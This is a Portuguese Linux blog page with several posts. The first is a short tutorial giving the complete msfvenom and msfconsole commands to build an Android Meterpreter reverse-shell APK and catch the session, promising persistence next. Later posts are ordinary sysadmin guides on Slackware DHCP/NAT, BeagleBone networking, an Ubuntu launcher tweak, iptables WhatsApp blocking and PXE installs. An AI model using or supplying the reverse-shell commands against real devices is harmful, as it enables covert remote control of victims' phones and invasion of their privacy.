Exploit Android 6 usando MSFvenom (Kali 2.2016)

0

Gente, nesse video eu mostro como com poucos comandos você pode explorar um Android na versão 6.0.
O video não tem intenção de ensinar ou induzir ninguém a invadir a privacidade de terceiros, mas sim demonstrar que falhas podem ser exploradas.

Usei apenas o msfvenom sem opções de encoder, arquitetura ou outros, basicamente apenas um exploit gerado pelo kali e que me deu acesso de forma reversa ao Android.
Aparelho : Moto G segunda Geração com android 6.0 com ultima atualização de segurança instalado.

Comandos usado neste video…
Criar o exploit, substitua ip pelo seu ip, porta pela devida porta e de o nome do app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=PORTA -o app.apk

Para estabelecer conexão :
msfconsole

use multi/handler

set payload android/meterpreter/reverse_tcp

set lhost IP_KALI

set lport porta

exploit -j ou run ou somente exploit

Bom, por hoje é só, logo mais mostro como deixar este exploit como algo que inicia todas as vezes que o dispositivo for ligado, obtendo assim um acesso monstro ao Android….rsrs
abraços

 

 

 

Configurando um Servidor Slackware – DHCP server, Nat com iptables simplificado.

1

Amigos, mais uma vez é um prazer imensuravel estar por aqui e poder compartilhar um pouco do meu conhecimento com essa grande comunidade.

Vamos configurar um Slackware para servir internet e DHCP ?
O video aborda as configurações basicas necessarias para que possamos ter nosso firewall funcinando. Este video será o primeiro de uma serie que farei a respeito do sistema, então vamos lá.

 

[ x ]
 

 

Configurações usadas por mim neste video.

dnsmasq.conf:

Primeiro, faça um backup das configurações atuais.

cd /etc/

mv dnsmasq.conf dnsmasq.conf.bkp

nano dnsmasq.conf

Adicione as linhas em cinza abaixo ou crie as regras de acordo com suas necessidades.
#ARQUIVO DE CONFIGURAÇÃO DHCP SERVER
#DECLARAR ABAIXO A INTERFACE A SER USADA
interface=eth1
#<IP INICIAL>,<IP FNAL>,<MASK>.<LEASE>
dhcp-range=10.22.33.100,10.22.33.120,255.255.255.0,12h
#GATEWAY PADRÃO
dhcp-option=3,10.22.33.1
#SERVIDORES DNS
dhcp-option=6,10.22.33.1
#SERVIDOR DE NOME – SUFIXO DNS
dhcp-option=15,slack-video.prefirolinux.com
#
dhcp-authoritative

rc.firewall
Siga os comandos para a criação do script

cd /etc/rc.d

nano rc.firewall e adicione as seguintes linhas destacadas em vermelho:

#!/bin/bash
iptables -P FORWARD ACCEPT
iptables -A POSTROUTING -t nat -s 10.22.33.0/24 -o eth0 MASQUERADE

 

[ x ]
 

Ao final dos procedimentos, dar permissão de execução aos seguintes arquivos.

rc.firewall – rc.dnsmasq – rc.ip_forward

Para tal use, chmod +x <nome do script>.

Bom, isso é tudo por enquanto .

Abraços e até a proxima !!

 

Instalando clientes de dynamic DNS no BEAGLEBONE GREEN

0

Ola galera, hoje irei mostrar minha experiência na instalação de clientes de dynamic DNS(DDNS) no BBG.
O uso de um DDNS se torna uma boa ferramenta quando queremos acessar nossos servidores por um rede fora da local usando IPs públicos.

Configurando interface de rede no BeagleBone Green

1

Ola galera! Hoje iremos começar algumas configurações básicas na nossa beaglebone green!

Para quem já tem a mesma sejam bem vindos! Para que não possui ainda visitem wiki da beaglebone e vejam o que essa incrível placa é capaz.

Ativando o MinimizeOnClick no Launcher do Ubuntu 16.04

0

Olá pessoal.

Vou ensinar a vocês como ativar a opção de minimizar os aplicativos abertos no Launcher do unity. Lembrem-se que esta opção só funciona legal quando se tem uma única sessão do aplicativo aberta.

Em primeiro lugar, para conseguir habilitar esta opção, precisaremos de um app chamado unity-tweak-tool. Para instalar, executamos o comando:

sudo apt install unity-tweak-tool

OBS: Na versão 16.04 do Ubuntu, o comando “apt-get” foi “reduzido” para apenas “apt”, porém vai da sua preferência, todos os dois funcionam perfeitamente.

Feita a instalação do app, clicamos sobre o botão “Pesquisar no seu computador” ou simplesmente apertamos a tecla Super (não é Iniciar… rs) e procuramos pelo nome unity-tweak-tool, conforme print abaixo:

utt

Com o app aberto, clique na opção “Lançador”.

launcher

Na tela que se abriu, marque a flag “Minimize single window applications on click”.

moc

E o resultado será este…

unity-launcher

 

Pronto…! 😀

 

Fonte: OMG Ubuntu!

Bloqueio Seletivo Whatsapp usando Iptables

0

Olá, meu nome é Thiago Ferreira e sou um dos colaboradores do PrefiroLinux, hoje mostrarei como podemos executar um bloqueio seletivo  de whatsapp e facebook usando apenas o iptables. Muito útil em ambientes onde se usa proxy transparente e não há  a possibilidade exectuar os devidos bloqueios e liberação pelas ACL’s do squid.
Aqui faremos de uma forma simples que requer apenas o conhecimento dos ips a serem bloqueados , estes se tratando da rede interna. E os ips que serão liberados, no caso apresentado os ips de nível publico.
Aqui deixo o script de forma bem simples, comentada e bem apresentado, inclusive com a notação de que cada comando fará, como o iptables tratará as regras básicas descritas.
Esse conteúdo originalmente foi incluído em minhas rotinas de bloqueio por volta de junho de 2015, após pesquisas feitas principalmente no linuxquestions.org e adaptado as minhas necessidades. Então, para futuras duvidas e buscas a base de busca deve ser o linuxquestions.
Sendo que aqui no nosso fórum temos o devido espaço para quaisquer esclarecimentos, vide;
http://forum.prefirolinux.com

As linhas são auto explicativas,  os comentários devem permanecer com o “#” antes das linhas que não são parte do script afim de evitar quaisquer erro de leitura do bash.

Criem os arquivos, bloqueio_seletivo, ipsliberados e ipsinterno

$nano /usr/share/bloqueio_seletivo
e dentro dele insira o seguinte script


Na lista de ipsliberados entre com os ips disponiveis no proprio site do whatsapp: https://www.whatsapp.com/cidr.txt .
Basta adicionar a lista a um arquivos em “/usr/share” :
$nano /usr/share/ipsliberados
Como exemplo, poderiamos ter uma serie de ips nessa ordem:

31.13.58.55
31.55.44.77
178.88.14.100

Adicione os ips, e crie um novo arquivo para inserirmos os ips da rede interna:

$nano /usr/share/ipsinterno

Em ipsinterno insiram os ips da sua rede, lembrando de seguir a seguinte regra.
Ips que serão bloqueados devem conter o “#” antes, pois o cut fará a leitura levando em consideração que esses são os unicos que devem ser tratados.
#10.10.10.44
#10.10.10.24
10.10.10.8
No caso acima, somente os dois primeiros serão bloqueados de acessar os serviços dos “ipsliberados”,  o “10.10.10.8” terá total acesso ao trafego.

Caso deseje, liste apenas os ips permitidos, sem a necessidade de usar o “#” antes do ip, ficando assim:
10.10.10.55
10.10.10.22

Aqui um exemplo do script limpo e sem comentarios…

Lembrem-se, leia todo o conteúdo do post inclusive do script para melhor entendimento.
Suporte no forum do prefirolinux.
Boa diversão

 

 

Instalação Debian e derivados via PXE [ live e install network pxe debian]

0
Pxe install

 

Instalando uma distribuição Linux via PXE, totalmente OFFLINE, sem uso de internet para baixar qualquer arquivo que não seja a imagem completa(full) do sistema, nada de ficar baixando pacotes durante a instalação!!!…
Administrar grandes quantidades de computadores nem sempre é uma tarefa fácil, por exemplo, quando se tem que formatar ou atualizar um grande numero de maquinas, mas que de certa forma implique na dificuldade de ter que fazer em maquina por maquina.
Esta solução foi testada amplamente em varias versões de S.O derivados do Ubuntu, como Xubuntu, Kubuntu, Ubuntu Server e o próprio Ubuntu .